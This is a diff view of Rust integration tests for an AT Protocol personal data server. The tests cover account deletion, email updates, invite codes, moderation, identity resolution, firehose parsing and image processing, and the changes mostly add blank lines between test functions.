assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#threadViewPref");
210
218
}
219
+
211
220
#[tokio::test]
212
221
async fn test_put_preferences_saved_feeds() {
213
222
let client = client();
···
249
258
assert_eq!(saved_feeds["$type"], "app.bsky.actor.defs#savedFeedsPrefV2");
250
259
assert!(saved_feeds["items"].as_array().unwrap().len() == 1);
251
260
}
261
+
252
262
#[tokio::test]
253
263
async fn test_put_preferences_muted_words() {
254
264
let client = client();
···
286
296
let prefs_arr = body["preferences"].as_array().unwrap();
287
297
assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#mutedWordsPref");
288
298
}
299
+
289
300
#[tokio::test]
290
301
async fn test_preferences_isolation_between_users() {
291
302
let client = client();
+8 tests/admin_email.rs
···
1
1
mod common;
2
+
2
3
use reqwest::StatusCode;
3
4
use serde_json::{json, Value};
4
5
use sqlx::PgPool;
6
+
5
7
async fn get_pool() -> PgPool {
6
8
let conn_str = common::get_db_connection_string().await;
7
9
sqlx::postgres::PgPoolOptions::new()
···
10
12
.await
11
13
.expect("Failed to connect to test database")
12
14
}
15
+
13
16
#[tokio::test]
14
17
async fn test_send_email_success() {
15
18
let client = common::client();
···
45
48
assert_eq!(notification.subject.as_deref(), Some("Test Admin Email"));
46
49
assert!(notification.body.contains("Hello, this is a test email from the admin."));
47
50
}
51
+
48
52
#[tokio::test]
49
53
async fn test_send_email_default_subject() {
50
54
let client = common::client();
···
79
83
assert!(notification.subject.is_some());
80
84
assert!(notification.subject.unwrap().contains("Message from"));
81
85
}
86
+
82
87
#[tokio::test]
83
88
async fn test_send_email_recipient_not_found() {
84
89
let client = common::client();
···
99
104
let body: Value = res.json().await.expect("Invalid JSON");
100
105
assert_eq!(body["error"], "AccountNotFound");
101
106
}
107
+
102
108
#[tokio::test]
103
109
async fn test_send_email_missing_content() {
104
110
let client = common::client();
···
119
125
let body: Value = res.json().await.expect("Invalid JSON");
120
126
assert_eq!(body["error"], "InvalidRequest");
121
127
}
128
+
122
129
#[tokio::test]
123
130
async fn test_send_email_missing_recipient() {
124
131
let client = common::client();
···
139
146
let body: Value = res.json().await.expect("Invalid JSON");
140
147
assert_eq!(body["error"], "InvalidRequest");
141
148
}
149
+
142
150
#[tokio::test]
143
151
async fn test_send_email_requires_auth() {
144
152
let client = common::client();
+12 tests/admin_invite.rs
···
1
1
mod common;
2
+
2
3
use common::*;
3
4
use reqwest::StatusCode;
4
5
use serde_json::{Value, json};
6
+
5
7
#[tokio::test]
6
8
async fn test_admin_get_invite_codes_success() {
7
9
let client = client();
···
32
34
let body: Value = res.json().await.expect("Response was not valid JSON");
33
35
assert!(body["codes"].is_array());
34
36
}
37
+
35
38
#[tokio::test]
36
39
async fn test_admin_get_invite_codes_with_limit() {
37
40
let client = client();
···
65
68
let codes = body["codes"].as_array().unwrap();
66
69
assert!(codes.len() <= 2);
67
70
}
71
+
68
72
#[tokio::test]
69
73
async fn test_admin_get_invite_codes_no_auth() {
70
74
let client = client();
···
78
82
.expect("Failed to send request");
79
83
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
80
84
}
85
+
81
86
#[tokio::test]
82
87
async fn test_disable_account_invites_success() {
83
88
let client = client();
···
113
118
let body: Value = res.json().await.expect("Response was not valid JSON");
114
119
assert_eq!(body["error"], "InvitesDisabled");
115
120
}
121
+
116
122
#[tokio::test]
117
123
async fn test_enable_account_invites_success() {
118
124
let client = client();
···
158
164
.expect("Failed to send request");
159
165
assert_eq!(res.status(), StatusCode::OK);
160
166
}
167
+
161
168
#[tokio::test]
162
169
async fn test_disable_account_invites_no_auth() {
163
170
let client = client();
···
175
182
.expect("Failed to send request");
176
183
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
177
184
}
185
+
178
186
#[tokio::test]
179
187
async fn test_disable_account_invites_not_found() {
180
188
let client = client();
···
194
202
.expect("Failed to send request");
195
203
assert_eq!(res.status(), StatusCode::NOT_FOUND);
196
204
}
205
+
197
206
#[tokio::test]
198
207
async fn test_disable_invite_codes_by_code() {
199
208
let client = client();
···
242
251
assert!(disabled_code.is_some());
243
252
assert_eq!(disabled_code.unwrap()["disabled"], true);
244
253
}
254
+
245
255
#[tokio::test]
246
256
async fn test_disable_invite_codes_by_account() {
247
257
let client = client();
···
289
299
assert_eq!(code["disabled"], true);
290
300
}
291
301
}
302
+
292
303
#[tokio::test]
293
304
async fn test_disable_invite_codes_no_auth() {
294
305
let client = client();
···
306
317
.expect("Failed to send request");
307
318
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
308
319
}
320
+
309
321
#[tokio::test]
310
322
async fn test_admin_enable_account_invites_not_found() {
311
323
let client = client();
+10 tests/admin_moderation.rs
···
1
1
mod common;
2
+
2
3
use common::*;
3
4
use reqwest::StatusCode;
4
5
use serde_json::{Value, json};
6
+
5
7
#[tokio::test]
6
8
async fn test_get_subject_status_user_success() {
7
9
let client = client();
···
22
24
assert_eq!(body["subject"]["$type"], "com.atproto.admin.defs#repoRef");
23
25
assert_eq!(body["subject"]["did"], did);
24
26
}
27
+
25
28
#[tokio::test]
26
29
async fn test_get_subject_status_not_found() {
27
30
let client = client();
···
40
43
let body: Value = res.json().await.expect("Response was not valid JSON");
41
44
assert_eq!(body["error"], "SubjectNotFound");
42
45
}
46
+
43
47
#[tokio::test]
44
48
async fn test_get_subject_status_no_param() {
45
49
let client = client();
···
57
61
let body: Value = res.json().await.expect("Response was not valid JSON");
58
62
assert_eq!(body["error"], "InvalidRequest");
59
63
}
64
+
60
65
#[tokio::test]
61
66
async fn test_get_subject_status_no_auth() {
62
67
let client = client();
···
71
76
.expect("Failed to send request");
72
77
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
73
78
}
79
+
74
80
#[tokio::test]
75
81
async fn test_update_subject_status_takedown_user() {
76
82
let client = client();
···
115
121
assert_eq!(status_body["takedown"]["applied"], true);
116
122
assert_eq!(status_body["takedown"]["ref"], "mod-action-123");
117
123
}
124
+
118
125
#[tokio::test]
119
126
async fn test_update_subject_status_remove_takedown() {
120
127
let client = client();
···
171
178
let status_body: Value = status_res.json().await.unwrap();
172
179
assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false));
173
180
}
181
+
174
182
#[tokio::test]
175
183
async fn test_update_subject_status_deactivate_user() {
176
184
let client = client();
···
209
217
assert!(status_body["deactivated"].is_object());
210
218
assert_eq!(status_body["deactivated"]["applied"], true);
211
219
}
220
+
212
221
#[tokio::test]
213
222
async fn test_update_subject_status_invalid_type() {
214
223
let client = client();
···
236
245
let body: Value = res.json().await.expect("Response was not valid JSON");
237
246
assert_eq!(body["error"], "InvalidRequest");
238
247
}
248
+
239
249
#[tokio::test]
240
250
async fn test_update_subject_status_no_auth() {
241
251
let client = client();
+6
tests/appview_integration.rs
···
1
1
mod common;
2
+
2
3
use common::{base_url, client, create_account_and_login};
3
4
use reqwest::StatusCode;
4
5
use serde_json::{json, Value};
6
+
5
7
#[tokio::test]
6
8
async fn test_get_author_feed_returns_appview_data() {
7
9
let client = client();
···
27
29
"Post text should match appview response"
28
30
);
29
31
}
32
+
30
33
#[tokio::test]
31
34
async fn test_get_actor_likes_returns_appview_data() {
32
35
let client = client();
···
52
55
"Post text should match appview response"
53
56
);
54
57
}
58
+
55
59
#[tokio::test]
56
60
async fn test_get_post_thread_returns_appview_data() {
57
61
let client = client();
···
80
84
"Post text should match appview response"
81
85
);
82
86
}
87
+
83
88
#[tokio::test]
84
89
async fn test_get_feed_returns_appview_data() {
85
90
let client = client();
···
105
110
"Post text should match appview response"
106
111
);
107
112
}
113
+
108
114
#[tokio::test]
109
115
async fn test_register_push_proxies_to_appview() {
110
116
let client = client();
+17
tests/common/mod.rs
···
14
14
use tokio::net::TcpListener;
15
15
use wiremock::matchers::{method, path};
16
16
use wiremock::{Mock, MockServer, ResponseTemplate};
17
+
17
18
static SERVER_URL: OnceLock<String> = OnceLock::new();
18
19
static APP_PORT: OnceLock<u16> = OnceLock::new();
19
20
static MOCK_APPVIEW: OnceLock<MockServer> = OnceLock::new();
21
+
20
22
#[cfg(not(feature = "external-infra"))]
21
23
use testcontainers::core::ContainerPort;
22
24
#[cfg(not(feature = "external-infra"))]
···
27
29
static DB_CONTAINER: OnceLock<ContainerAsync<Postgres>> = OnceLock::new();
28
30
#[cfg(not(feature = "external-infra"))]
29
31
static S3_CONTAINER: OnceLock<ContainerAsync<GenericImage>> = OnceLock::new();
32
+
30
33
#[allow(dead_code)]
31
34
pub const AUTH_TOKEN: &str = "test-token";
32
35
#[allow(dead_code)]
···
35
38
pub const AUTH_DID: &str = "did:plc:fake";
36
39
#[allow(dead_code)]
37
40
pub const TARGET_DID: &str = "did:plc:target";
41
+
38
42
fn has_external_infra() -> bool {
39
43
std::env::var("BSPDS_TEST_INFRA_READY").is_ok()
40
44
|| (std::env::var("DATABASE_URL").is_ok() && std::env::var("S3_ENDPOINT").is_ok())
···
54
58
.args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"])
55
59
.output();
56
60
}
61
+
57
62
#[allow(dead_code)]
58
63
pub fn client() -> Client {
59
64
Client::new()
60
65
}
66
+
61
67
#[allow(dead_code)]
62
68
pub fn app_port() -> u16 {
63
69
*APP_PORT.get().expect("APP_PORT not initialized")
64
70
}
71
+
65
72
pub async fn base_url() -> &'static str {
66
73
SERVER_URL.get_or_init(|| {
67
74
let (tx, rx) = std::sync::mpsc::channel();
···
94
101
rx.recv().expect("Failed to start test server")
95
102
})
96
103
}
104
+
97
105
async fn setup_with_external_infra() -> String {
98
106
let database_url = std::env::var("DATABASE_URL")
99
107
.expect("DATABASE_URL must be set when using external infra");
···
114
122
MOCK_APPVIEW.set(mock_server).ok();
115
123
spawn_app(database_url).await
116
124
}
125
+
117
126
#[cfg(not(feature = "external-infra"))]
118
127
async fn setup_with_testcontainers() -> String {
119
128
let s3_container = GenericImage::new("minio/minio", "latest")
···
177
186
DB_CONTAINER.set(container).ok();
178
187
spawn_app(connection_string).await
179
188
}
189
+
180
190
#[cfg(feature = "external-infra")]
181
191
async fn setup_with_testcontainers() -> String {
182
192
panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT.");
183
193
}
194
+
184
195
async fn setup_mock_appview(mock_server: &MockServer) {
185
196
Mock::given(method("GET"))
186
197
.and(path("/xrpc/app.bsky.actor.getProfile"))
···
310
321
.mount(mock_server)
311
322
.await;
312
323
}
324
+
313
325
async fn spawn_app(database_url: String) -> String {
314
326
use bspds::rate_limit::RateLimiters;
315
327
let pool = PgPoolOptions::new()
···
342
354
});
343
355
format!("http://{}", addr)
344
356
}
357
+
345
358
#[allow(dead_code)]
346
359
pub async fn get_db_connection_string() -> String {
347
360
base_url().await;
···
360
373
}
361
374
}
362
375
}
376
+
363
377
#[allow(dead_code)]
364
378
pub async fn verify_new_account(client: &Client, did: &str) -> String {
365
379
let conn_str = get_db_connection_string().await;
···
396
410
.expect("No accessJwt in confirmSignup response")
397
411
.to_string()
398
412
}
413
+
399
414
#[allow(dead_code)]
400
415
pub async fn upload_test_blob(client: &Client, data: &'static str, mime: &'static str) -> Value {
401
416
let res = client
···
413
428
let body: Value = res.json().await.expect("Blob upload response was not JSON");
414
429
body["blob"].clone()
415
430
}
431
+
416
432
#[allow(dead_code)]
417
433
pub async fn create_test_post(
418
434
client: &Client,
···
463
479
.to_string();
464
480
(uri, cid, rkey)
465
481
}
482
+
466
483
#[allow(dead_code)]
467
484
pub async fn create_account_and_login(client: &Client) -> (String, String) {
468
485
let mut last_error = String::new();
+10
tests/delete_account.rs
···
5
5
use reqwest::StatusCode;
6
6
use serde_json::{Value, json};
7
7
use sqlx::PgPool;
8
+
8
9
async fn get_pool() -> PgPool {
9
10
let conn_str = get_db_connection_string().await;
10
11
sqlx::postgres::PgPoolOptions::new()
···
13
14
.await
14
15
.expect("Failed to connect to test database")
15
16
}
17
+
16
18
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) {
17
19
let res = client
18
20
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
30
32
let jwt = verify_new_account(client, &did).await;
31
33
(did, jwt)
32
34
}
35
+
33
36
#[tokio::test]
34
37
async fn test_delete_account_full_flow() {
35
38
let client = client();
···
86
89
.expect("Failed to check session");
87
90
assert_eq!(session_res.status(), StatusCode::UNAUTHORIZED);
88
91
}
92
+
89
93
#[tokio::test]
90
94
async fn test_delete_account_wrong_password() {
91
95
let client = client();
···
129
133
let body: Value = delete_res.json().await.unwrap();
130
134
assert_eq!(body["error"], "AuthenticationFailed");
131
135
}
136
+
132
137
#[tokio::test]
133
138
async fn test_delete_account_invalid_token() {
134
139
let client = client();
···
171
176
let body: Value = delete_res.json().await.unwrap();
172
177
assert_eq!(body["error"], "InvalidToken");
173
178
}
179
+
174
180
#[tokio::test]
175
181
async fn test_delete_account_expired_token() {
176
182
let client = client();
···
221
227
let body: Value = delete_res.json().await.unwrap();
222
228
assert_eq!(body["error"], "ExpiredToken");
223
229
}
230
+
224
231
#[tokio::test]
225
232
async fn test_delete_account_token_mismatch() {
226
233
let client = client();
···
268
275
let body: Value = delete_res.json().await.unwrap();
269
276
assert_eq!(body["error"], "InvalidToken");
270
277
}
278
+
271
279
#[tokio::test]
272
280
async fn test_delete_account_with_app_password() {
273
281
let client = client();
···
327
335
.expect("Failed to query user");
328
336
assert!(user_row.is_none(), "User should be deleted from database");
329
337
}
338
+
330
339
#[tokio::test]
331
340
async fn test_delete_account_missing_fields() {
332
341
let client = client();
···
371
380
.expect("Failed to send request");
372
381
assert_eq!(res3.status(), StatusCode::UNPROCESSABLE_ENTITY);
373
382
}
383
+
374
384
#[tokio::test]
375
385
async fn test_delete_account_nonexistent_user() {
376
386
let client = client();
+14
tests/email_update.rs
···
2
2
use reqwest::StatusCode;
3
3
use serde_json::{json, Value};
4
4
use sqlx::PgPool;
5
+
5
6
async fn get_pool() -> PgPool {
6
7
let conn_str = common::get_db_connection_string().await;
7
8
sqlx::postgres::PgPoolOptions::new()
···
10
11
.await
11
12
.expect("Failed to connect to test database")
12
13
}
14
+
13
15
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String {
14
16
let res = client
15
17
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
26
28
let did = body["did"].as_str().expect("No did");
27
29
common::verify_new_account(client, did).await
28
30
}
31
+
29
32
#[tokio::test]
30
33
async fn test_email_update_flow_success() {
31
34
let client = common::client();
···
77
80
assert!(user.email_pending_verification.is_none());
78
81
assert!(user.email_confirmation_code.is_none());
79
82
}
83
+
80
84
#[tokio::test]
81
85
async fn test_request_email_update_taken_email() {
82
86
let client = common::client();
···
98
102
let body: Value = res.json().await.expect("Invalid JSON");
99
103
assert_eq!(body["error"], "EmailTaken");
100
104
}
105
+
101
106
#[tokio::test]
102
107
async fn test_confirm_email_invalid_token() {
103
108
let client = common::client();
···
128
133
let body: Value = res.json().await.expect("Invalid JSON");
129
134
assert_eq!(body["error"], "InvalidToken");
130
135
}
136
+
131
137
#[tokio::test]
132
138
async fn test_confirm_email_wrong_email() {
133
139
let client = common::client();
···
164
170
let body: Value = res.json().await.expect("Invalid JSON");
165
171
assert_eq!(body["message"], "Email does not match pending update");
166
172
}
173
+
167
174
#[tokio::test]
168
175
async fn test_update_email_success_no_token_required() {
169
176
let client = common::client();
···
187
194
.expect("User not found");
188
195
assert_eq!(user.email, Some(new_email));
189
196
}
197
+
190
198
#[tokio::test]
191
199
async fn test_update_email_same_email_noop() {
192
200
let client = common::client();
···
203
211
.expect("Failed to update email");
204
212
assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op");
205
213
}
214
+
206
215
#[tokio::test]
207
216
async fn test_update_email_requires_token_after_pending() {
208
217
let client = common::client();
···
230
239
let body: Value = res.json().await.expect("Invalid JSON");
231
240
assert_eq!(body["error"], "TokenRequired");
232
241
}
242
+
233
243
#[tokio::test]
234
244
async fn test_update_email_with_valid_token() {
235
245
let client = common::client();
···
273
283
assert_eq!(user.email, Some(new_email));
274
284
assert!(user.email_pending_verification.is_none());
275
285
}
286
+
276
287
#[tokio::test]
277
288
async fn test_update_email_invalid_token() {
278
289
let client = common::client();
···
303
314
let body: Value = res.json().await.expect("Invalid JSON");
304
315
assert_eq!(body["error"], "InvalidToken");
305
316
}
317
+
306
318
#[tokio::test]
307
319
async fn test_update_email_already_taken() {
308
320
let client = common::client();
···
324
336
let body: Value = res.json().await.expect("Invalid JSON");
325
337
assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest");
326
338
}
339
+
327
340
#[tokio::test]
328
341
async fn test_update_email_no_auth() {
329
342
let client = common::client();
···
338
351
let body: Value = res.json().await.expect("Invalid JSON");
339
352
assert_eq!(body["error"], "AuthenticationRequired");
340
353
}
354
+
341
355
#[tokio::test]
342
356
async fn test_update_email_invalid_format() {
343
357
let client = common::client();
+7
tests/feed.rs
···
1
1
mod common;
2
2
use common::{base_url, client, create_account_and_login};
3
3
use serde_json::json;
4
+
4
5
#[tokio::test]
5
6
async fn test_get_timeline_requires_auth() {
6
7
let client = client();
···
12
13
.unwrap();
13
14
assert_eq!(res.status(), 401);
14
15
}
16
+
15
17
#[tokio::test]
16
18
async fn test_get_author_feed_requires_actor() {
17
19
let client = client();
···
25
27
.unwrap();
26
28
assert_eq!(res.status(), 400);
27
29
}
30
+
28
31
#[tokio::test]
29
32
async fn test_get_actor_likes_requires_actor() {
30
33
let client = client();
···
38
41
.unwrap();
39
42
assert_eq!(res.status(), 400);
40
43
}
44
+
41
45
#[tokio::test]
42
46
async fn test_get_post_thread_requires_uri() {
43
47
let client = client();
···
51
55
.unwrap();
52
56
assert_eq!(res.status(), 400);
53
57
}
58
+
54
59
#[tokio::test]
55
60
async fn test_get_feed_requires_auth() {
56
61
let client = client();
···
65
70
.unwrap();
66
71
assert_eq!(res.status(), 401);
67
72
}
73
+
68
74
#[tokio::test]
69
75
async fn test_get_feed_requires_feed_param() {
70
76
let client = client();
···
78
84
.unwrap();
79
85
assert_eq!(res.status(), 400);
80
86
}
87
+
81
88
#[tokio::test]
82
89
async fn test_register_push_requires_auth() {
83
90
let client = client();
+6
tests/firehose.rs
···
8
8
use serde_json::{json, Value};
9
9
use std::io::Cursor;
10
10
use tokio_tungstenite::{connect_async, tungstenite};
11
+
11
12
#[derive(Debug, Deserialize)]
12
13
struct FrameHeader {
13
14
op: i64,
14
15
t: String,
15
16
}
17
+
16
18
#[derive(Debug, Deserialize)]
17
19
struct CommitFrame {
18
20
seq: i64,
···
29
31
blobs: Vec<Cid>,
30
32
time: String,
31
33
}
34
+
32
35
#[derive(Debug, Deserialize)]
33
36
struct RepoOp {
34
37
action: String,
35
38
path: String,
36
39
cid: Option<Cid>,
37
40
}
41
+
38
42
fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> {
39
43
let mut pos = 0;
40
44
fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> {
···
104
108
skip_value(bytes, &mut pos)?;
105
109
Ok(pos)
106
110
}
111
+
107
112
fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> {
108
113
let header_len = find_cbor_map_end(bytes)?;
109
114
let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len])
···
113
118
.map_err(|e| format!("Failed to parse commit frame: {:?}", e))?;
114
119
Ok((header, frame))
115
120
}
121
+
116
122
#[tokio::test]
117
123
async fn test_firehose_subscription() {
118
124
let client = client();
+1
-1
tests/firehose_validation.rs
+6
tests/helpers/mod.rs
···
1
1
use chrono::Utc;
2
2
use reqwest::StatusCode;
3
3
use serde_json::{Value, json};
4
+
4
5
pub use crate::common::*;
6
+
5
7
#[allow(dead_code)]
6
8
pub async fn setup_new_user(handle_prefix: &str) -> (String, String) {
7
9
let client = client();
···
40
42
let new_jwt = verify_new_account(&client, &new_did).await;
41
43
(new_did, new_jwt)
42
44
}
45
+
43
46
#[allow(dead_code)]
44
47
pub async fn create_post(
45
48
client: &reqwest::Client,
···
83
86
let cid = create_body["cid"].as_str().unwrap().to_string();
84
87
(uri, cid)
85
88
}
89
+
86
90
#[allow(dead_code)]
87
91
pub async fn create_follow(
88
92
client: &reqwest::Client,
···
126
130
let cid = create_body["cid"].as_str().unwrap().to_string();
127
131
(uri, cid)
128
132
}
133
+
129
134
#[allow(dead_code)]
130
135
pub async fn create_like(
131
136
client: &reqwest::Client,
···
167
172
body["cid"].as_str().unwrap().to_string(),
168
173
)
169
174
}
175
+
170
176
#[allow(dead_code)]
171
177
pub async fn create_repost(
172
178
client: &reqwest::Client,
+9
tests/identity.rs
···
4
4
use serde_json::{Value, json};
5
5
use wiremock::matchers::{method, path};
6
6
use wiremock::{Mock, MockServer, ResponseTemplate};
7
+
7
8
#[tokio::test]
8
9
async fn test_resolve_handle_success() {
9
10
let client = client();
···
39
40
let body: Value = res.json().await.expect("Response was not valid JSON");
40
41
assert_eq!(body["did"], did);
41
42
}
43
+
42
44
#[tokio::test]
43
45
async fn test_resolve_handle_not_found() {
44
46
let client = client();
···
56
58
let body: Value = res.json().await.expect("Response was not valid JSON");
57
59
assert_eq!(body["error"], "HandleNotFound");
58
60
}
61
+
59
62
#[tokio::test]
60
63
async fn test_resolve_handle_missing_param() {
61
64
let client = client();
···
69
72
.expect("Failed to send request");
70
73
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
71
74
}
75
+
72
76
#[tokio::test]
73
77
async fn test_well_known_did() {
74
78
let client = client();
···
82
86
assert!(body["id"].as_str().unwrap().starts_with("did:web:"));
83
87
assert_eq!(body["service"][0]["type"], "AtprotoPersonalDataServer");
84
88
}
89
+
85
90
#[tokio::test]
86
91
async fn test_create_did_web_account_and_resolve() {
87
92
let client = client();
···
145
150
assert_eq!(doc["verificationMethod"][0]["controller"], did);
146
151
assert!(doc["verificationMethod"][0]["publicKeyJwk"].is_object());
147
152
}
153
+
148
154
#[tokio::test]
149
155
async fn test_create_account_duplicate_handle() {
150
156
let client = client();
···
178
184
let body: Value = res.json().await.expect("Response was not JSON");
179
185
assert_eq!(body["error"], "HandleTaken");
180
186
}
187
+
181
188
#[tokio::test]
182
189
async fn test_did_web_lifecycle() {
183
190
let client = client();
···
267
274
assert_eq!(record_body["value"]["displayName"], "DID Web User");
268
275
*/
269
276
}
277
+
270
278
#[tokio::test]
271
279
async fn test_get_recommended_did_credentials_success() {
272
280
let client = client();
···
296
304
assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer");
297
305
assert!(body["services"]["atprotoPds"]["endpoint"].is_string());
298
306
}
307
+
299
308
#[tokio::test]
300
309
async fn test_get_recommended_did_credentials_no_auth() {
301
310
let client = client();
+31
tests/image_processing.rs
···
1
1
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
2
2
use image::{DynamicImage, ImageFormat};
3
3
use std::io::Cursor;
4
+
4
5
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
5
6
let img = DynamicImage::new_rgb8(width, height);
6
7
let mut buf = Vec::new();
7
8
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
8
9
buf
9
10
}
11
+
10
12
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
11
13
let img = DynamicImage::new_rgb8(width, height);
12
14
let mut buf = Vec::new();
13
15
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
14
16
buf
15
17
}
18
+
16
19
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
17
20
let img = DynamicImage::new_rgb8(width, height);
18
21
let mut buf = Vec::new();
19
22
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
20
23
buf
21
24
}
25
+
22
26
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
23
27
let img = DynamicImage::new_rgb8(width, height);
24
28
let mut buf = Vec::new();
25
29
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
26
30
buf
27
31
}
32
+
28
33
#[test]
29
34
fn test_process_png() {
30
35
let processor = ImageProcessor::new();
···
33
38
assert_eq!(result.original.width, 500);
34
39
assert_eq!(result.original.height, 500);
35
40
}
41
+
36
42
#[test]
37
43
fn test_process_jpeg() {
38
44
let processor = ImageProcessor::new();
···
41
47
assert_eq!(result.original.width, 400);
42
48
assert_eq!(result.original.height, 300);
43
49
}
50
+
44
51
#[test]
45
52
fn test_process_gif() {
46
53
let processor = ImageProcessor::new();
···
49
56
assert_eq!(result.original.width, 200);
50
57
assert_eq!(result.original.height, 200);
51
58
}
59
+
52
60
#[test]
53
61
fn test_process_webp() {
54
62
let processor = ImageProcessor::new();
···
57
65
assert_eq!(result.original.width, 300);
58
66
assert_eq!(result.original.height, 200);
59
67
}
68
+
60
69
#[test]
61
70
fn test_thumbnail_feed_size() {
62
71
let processor = ImageProcessor::new();
···
66
75
assert!(thumb.width <= THUMB_SIZE_FEED);
67
76
assert!(thumb.height <= THUMB_SIZE_FEED);
68
77
}
78
+
69
79
#[test]
70
80
fn test_thumbnail_full_size() {
71
81
let processor = ImageProcessor::new();
···
75
85
assert!(thumb.width <= THUMB_SIZE_FULL);
76
86
assert!(thumb.height <= THUMB_SIZE_FULL);
77
87
}
88
+
78
89
#[test]
79
90
fn test_no_thumbnail_small_image() {
80
91
let processor = ImageProcessor::new();
···
83
94
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
84
95
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
85
96
}
97
+
86
98
#[test]
87
99
fn test_webp_conversion() {
88
100
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
90
102
let result = processor.process(&data, "image/png").unwrap();
91
103
assert_eq!(result.original.mime_type, "image/webp");
92
104
}
105
+
93
106
#[test]
94
107
fn test_jpeg_output_format() {
95
108
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
···
97
110
let result = processor.process(&data, "image/png").unwrap();
98
111
assert_eq!(result.original.mime_type, "image/jpeg");
99
112
}
113
+
100
114
#[test]
101
115
fn test_png_output_format() {
102
116
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
···
104
118
let result = processor.process(&data, "image/jpeg").unwrap();
105
119
assert_eq!(result.original.mime_type, "image/png");
106
120
}
121
+
107
122
#[test]
108
123
fn test_max_dimension_enforced() {
109
124
let processor = ImageProcessor::new().with_max_dimension(1000);
···
116
131
assert_eq!(max_dimension, 1000);
117
132
}
118
133
}
134
+
119
135
#[test]
120
136
fn test_file_size_limit() {
121
137
let processor = ImageProcessor::new().with_max_file_size(100);
···
127
143
assert_eq!(max_size, 100);
128
144
}
129
145
}
146
+
130
147
#[test]
131
148
fn test_default_max_file_size() {
132
149
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
133
150
}
151
+
134
152
#[test]
135
153
fn test_unsupported_format_rejected() {
136
154
let processor = ImageProcessor::new();
···
138
156
let result = processor.process(data, "application/octet-stream");
139
157
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
140
158
}
159
+
141
160
#[test]
142
161
fn test_corrupted_image_handling() {
143
162
let processor = ImageProcessor::new();
···
145
164
let result = processor.process(data, "image/png");
146
165
assert!(matches!(result, Err(ImageError::DecodeError(_))));
147
166
}
167
+
148
168
#[test]
149
169
fn test_aspect_ratio_preserved_landscape() {
150
170
let processor = ImageProcessor::new();
···
155
175
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
156
176
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
157
177
}
178
+
158
179
#[test]
159
180
fn test_aspect_ratio_preserved_portrait() {
160
181
let processor = ImageProcessor::new();
···
165
186
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
166
187
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
167
188
}
189
+
168
190
#[test]
169
191
fn test_mime_type_detection_auto() {
170
192
let processor = ImageProcessor::new();
···
172
194
let result = processor.process(&data, "application/octet-stream");
173
195
assert!(result.is_ok(), "Should detect PNG format from data");
174
196
}
197
+
175
198
#[test]
176
199
fn test_is_supported_mime_type() {
177
200
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
···
186
209
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
187
210
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
188
211
}
212
+
189
213
#[test]
190
214
fn test_strip_exif() {
191
215
let data = create_test_jpeg(100, 100);
···
194
218
let stripped = result.unwrap();
195
219
assert!(!stripped.is_empty());
196
220
}
221
+
197
222
#[test]
198
223
fn test_with_thumbnails_disabled() {
199
224
let processor = ImageProcessor::new().with_thumbnails(false);
···
202
227
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
203
228
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
204
229
}
230
+
205
231
#[test]
206
232
fn test_builder_chaining() {
207
233
let processor = ImageProcessor::new()
···
213
239
let result = processor.process(&data, "image/png").unwrap();
214
240
assert_eq!(result.original.mime_type, "image/jpeg");
215
241
}
242
+
216
243
#[test]
217
244
fn test_processed_image_fields() {
218
245
let processor = ImageProcessor::new();
···
223
250
assert!(result.original.width > 0);
224
251
assert!(result.original.height > 0);
225
252
}
253
+
226
254
#[test]
227
255
fn test_only_feed_thumbnail_for_medium_images() {
228
256
let processor = ImageProcessor::new();
···
231
259
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
232
260
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
233
261
}
262
+
234
263
